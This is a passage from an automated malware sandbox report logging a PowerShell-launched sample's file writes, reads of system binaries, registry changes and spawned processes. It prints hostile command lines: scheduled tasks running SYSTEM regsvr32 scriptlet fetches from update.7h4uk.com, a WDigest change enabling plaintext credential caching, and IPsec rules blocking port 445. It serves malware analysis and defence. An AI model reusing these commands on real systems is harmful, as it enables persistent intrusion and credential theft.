C:\Users\user\AppData\Local\Temp\java-log-9527.log | unknown | 22528 | MZ...... @..... ...... ...... !..L.!This program cannot be run in DOS mode.... $...... @...... 2..... ..k...... k...... ...... I...... Rich...... ...... PE..L...De.[...... ...... V..... | success or wait | 1 | 17E08E7 | WriteFile
C:\Users\user\AppData\Local\Temp\cohernece.exe | unknown | 1827440 | MZP...... @..... ...... ...... !..L.!..This program must be run under Win32..$7 ...... ...... ...... ...... ...... ...... | success or wait | 1 | 17E08E7 | WriteFile

File Read

File Path | Offset | Length | Completion | Count | Address | Symbol
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EC01C | unknown
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch | unknown | 48 | success or wait | 1 | 6C9AAC6F | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch | unknown | 48 | success or wait | 1 | 6C9AAC6F | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EF210 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EF210 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EF210 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 4096 | success or wait | 4 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 781 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | unknown | 4096 | success or wait | 42 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics..ps1xml | unknown | 4096 | success or wait | 7 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 542 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 4096 | success or wait | 6 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 78 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 4096 | success or wait | 7 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 310 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 4096 | success or wait | 18 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 50 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | unknown | 4096 | success or wait | 7 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\.format.ps1xml | unknown | 4096 | success or wait | 63 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 201 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 4096 | success or wait | 22 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 409 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 4096 | success or wait | 5 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 844 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 4096 | success or wait | 5 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 360 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Users\user\Desktop\antitrojan.ps1 | unknown | 4096 | success or wait | 503 | 17E08E7 | ReadFile
C:\Users\user\Desktop\antitrojan.ps1 | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 2 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
unknown | unknown | 4096 | success or wait | 3 | 17E08E7 | ReadFile
unknown | unknown | 4096 | pipe broken | 2 | 17E08E7 | ReadFile
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown
C:\Windows\System32\csrss.exe | unknown | 4096 | success or wait | 2 | 17E08E7 | ReadFile
C:\Windows\System32\csrss.exe | unknown | 4096 | success or wait | 2 | 17E08E7 | ReadFile
C:\Windows\System32\csrss.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\csrss.exe | unknown | 4096 | end of file | 4 | 17E08E7 | ReadFile
C:\Windows\System32\csrss.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\wininit.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\wininit.exe | unknown | 4096 | success or wait | 23 | 17E08E7 | ReadFile
C:\Windows\System32\wininit.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\wininit.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\wininit.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\winlogon.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\winlogon.exe | unknown | 4096 | success or wait | 74 | 17E08E7 | ReadFile
C:\Windows\System32\winlogon.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\winlogon.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\winlogon.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\services.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\services.exe | unknown | 4096 | success or wait | 62 | 17E08E7 | ReadFile
C:\Windows\System32\services.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\services.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\services.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsass.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsass.exe | unknown | 4096 | success or wait | 5 | 17E08E7 | ReadFile
C:\Windows\System32\lsass.exe | unknown | 512 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsass.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsass.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsm.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsm.exe | unknown | 4096 | success or wait | 65 | 17E08E7 | ReadFile
C:\Windows\System32\lsm.exe | unknown | 512 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsm.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\lsm.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\svchost.exe | unknown | 4096 | success or wait | 10 | 17E08E7 | ReadFile
C:\Windows\System32\svchost.exe | unknown | 4096 | success or wait | 50 | 17E08E7 | ReadFile
C:\Windows\System32\svchost.exe | unknown | 4096 | end of file | 10 | 17E08E7 | ReadFile
C:\Windows\System32\svchost.exe | unknown | 4096 | end of file | 10 | 17E08E7 | ReadFile
C:\Windows\System32\spoolsv.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\spoolsv.exe | unknown | 4096 | success or wait | 76 | 17E08E7 | ReadFile
C:\Windows\System32\spoolsv.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\spoolsv.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\spoolsv.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\spoolsv.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dwm.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dwm.exe | unknown | 4096 | success or wait | 22 | 17E08E7 | ReadFile
C:\Windows\System32\dwm.exe | unknown | 512 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dwm.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dwm.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
unknown | unknown | 4096 | pipe broken | 2 | 17E08E7 | ReadFile
C:\Windows\System32\dllhost.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dllhost.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dllhost.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\dllhost.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\dllhost.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | unknown | 4096 | success or wait | 26 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | unknown | 888 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiPrvSE.exe | unknown | 4096 | success or wait | 3 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiPrvSE.exe | unknown | 4096 | success or wait | 186 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiPrvSE.exe | unknown | 512 | end of file | 3 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiPrvSE.exe | unknown | 4096 | end of file | 3 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiPrvSE.exe | unknown | 4096 | end of file | 3 | 17E08E7 | ReadFile
C:\Windows\System32\msiexec.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\msiexec.exe | unknown | 4096 | success or wait | 17 | 17E08E7 | ReadFile
C:\Windows\System32\msiexec.exe | unknown | 512 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\msiexec.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\msiexec.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\conhost.exe | unknown | 4096 | success or wait | 4 | 17E08E7 | ReadFile
C:\Windows\System32\conhost.exe | unknown | 4096 | success or wait | 264 | 17E08E7 | ReadFile
C:\Windows\System32\conhost.exe | unknown | 4096 | end of file | 4 | 17E08E7 | ReadFile
C:\Windows\System32\conhost.exe | unknown | 4096 | end of file | 8 | 17E08E7 | ReadFile
C:\Windows\System32\conhost.exe | unknown | 4096 | end of file | 4 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | success or wait | 3 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | success or wait | 321 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | success or wait | 3 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | success or wait | 6 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | end of file | 3 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | end of file | 6 | 17E08E7 | ReadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | unknown | 4096 | end of file | 3 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiApSrv.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiApSrv.exe | unknown | 4096 | success or wait | 33 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiApSrv.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiApSrv.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\wbem\WmiApSrv.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\taskeng.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\taskeng.exe | unknown | 4096 | success or wait | 45 | 17E08E7 | ReadFile
C:\Windows\System32\taskeng.exe | unknown | 4096 | success or wait | 1 | 17E08E7 | ReadFile
C:\Windows\System32\taskeng.exe | unknown | 512 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\taskeng.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\taskeng.exe | unknown | 4096 | end of file | 1 | 17E08E7 | ReadFile
C:\Windows\System32\regsvr32.exe | unknown | 4096 | success or wait | 2 | 17E08E7 | ReadFile
C:\Windows\System32\regsvr32.exe | unknown | 4096 | success or wait | 6 | 17E08E7 | ReadFile
C:\Windows\System32\regsvr32.exe | unknown | 512 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\regsvr32.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\regsvr32.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\cmd.exe | unknown | 4096 | success or wait | 2 | 17E08E7 | ReadFile
C:\Windows\System32\cmd.exe | unknown | 4096 | success or wait | 146 | 17E08E7 | ReadFile
C:\Windows\System32\cmd.exe | unknown | 512 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\cmd.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\cmd.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\reg.exe | unknown | 4096 | success or wait | 2 | 17E08E7 | ReadFile
C:\Windows\System32\reg.exe | unknown | 4096 | success or wait | 30 | 17E08E7 | ReadFile
C:\Windows\System32\reg.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile
C:\Windows\System32\reg.exe | unknown | 4096 | end of file | 4 | 17E08E7 | ReadFile
C:\Windows\System32\reg.exe | unknown | 4096 | end of file | 2 | 17E08E7 | ReadFile

Registry Activities

Source Key Path Completion Count Address Symbol

Key Value Created

Key Path | Name | Type | Data | Completion | Count | Address | Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest | UseLogonCredential | dword | 1 | success or wait | 1 | 17E54B2 | RegSetValueExW

Analysis Process: netsh.exe PID: 3436 Parent PID: 3268

General

Start time: 05:05:56
Start date: 04/09/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc
Imagebase: 0x1360000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Analysis Process: netsh.exe PID: 3464 Parent PID: 3268

General

Start time: 05:05:57
Start date: 04/09/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block
Imagebase: 0x1360000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3484 Parent PID: 3268

General

Start time: 05:05:57
Start date: 04/09/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block
Imagebase: 0x1360000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3512 Parent PID: 3268

General

Start time: 05:05:58
Start date: 04/09/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
Imagebase: 0x1360000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3548 Parent PID: 3268

General

Start time: 05:05:59
Start date: 04/09/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
Imagebase: 0x1360000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3592 Parent PID: 3268

General

Start time: 05:06:00
Start date: 04/09/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y
Imagebase: 0x1360000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: schtasks.exe PID: 3780 Parent PID: 3268

General

Start time: 05:06:13
Start date: 04/09/2018
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /create /tn WindowsLogTasks /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc onstart /ru System /F
Imagebase: 0x250000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: schtasks.exe PID: 3796 Parent PID: 3268

General

Start time: 05:06:14
Start date: 04/09/2018
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /create /tn 'System Log Security Check' /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc minute /mo 20 /ru System /F
Imagebase: 0x250000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: schtasks.exe PID: 3808 Parent PID: 3268

General

Start time: 05:06:14
Start date: 04/09/2018
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f
Imagebase: 0x250000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: taskeng.exe PID: 3816 Parent PID: 848

General

Start time: 05:26:00
Start date: 04/09/2018
Path: C:\Windows\System32\taskeng.exe
Wow64 process (32bit): false
Commandline: taskeng.exe {639D9766-C719-4F35-A71E-727C31918952} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase: 0x150000
File size: 192000 bytes
MD5 hash: 4F2659160AFCCA990305816946F69407
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: powercfg.exe PID: 3828 Parent PID: 3268

General

Start time: 05:26:00
Start date: 04/09/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0
Imagebase: 0x3d0000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: powercfg.exe PID: 3840 Parent PID: 3268

General

Start time: 05:26:00
Start date: 04/09/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0
Imagebase: 0x3d0000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: regsvr32.exe PID: 3876 Parent PID: 3816

General

Start time: 05:26:01
Start date: 04/09/2018
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
Imagebase: 0xbf0000
File size: 14848 bytes
MD5 hash: 432BE6CF7311062633459EEF6B242FB5
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: powercfg.exe PID: 3892 Parent PID: 3268

General

Start time: 05:26:02
Start date: 04/09/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Imagebase: 0x3d0000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: regsvr32.exe PID: 3884 Parent PID: 3816

General

Start time: 05:26:02
Start date: 04/09/2018
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
Imagebase: 0xbf0000
File size: 14848 bytes
MD5 hash: 432BE6CF7311062633459EEF6B242FB5
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: NETSTAT.EXE PID: 3900 Parent PID: 3268

General

Start time: 05:26:02
Start date: 04/09/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0xf30000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: csc.exe PID: 3968 Parent PID: 3268

General

Start time: 05:26:11
Start date: 04/09/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline'
Imagebase: 0x400000
File size: 77960 bytes
MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: NETSTAT.EXE PID: 4004 Parent PID: 3268

General

Start time: 05:26:11
Start date: 04/09/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0xc60000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: cmd.exe PID: 4040 Parent PID: 3876

General

Start time: 05:26:12
Start date: 04/09/2018
